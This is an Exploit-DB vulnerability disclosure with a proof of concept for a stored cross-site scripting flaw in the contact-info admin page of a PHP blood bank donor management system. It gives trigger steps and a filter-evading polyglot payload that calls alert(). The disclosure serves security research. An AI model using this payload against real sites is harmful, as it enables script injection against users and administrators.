Blood Bank & Donor Management System using v2.2 – Stored XSS

  • 作者: SoSPiro
    日期: 2024-01-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51750/
  • # Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
    # Application: Blood Donor Management System
    # Version: v2.2 
    # Bugs:Stored XSS
    # Technology: PHP
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
    # Date: 12.09.2023
    # Author: SoSPiro
    # Tested on: Windows
    
    #POC
    ========================================
    1. Login to admin account
    2. Go to /admin/update-contactinfo.php
    3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.
    4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.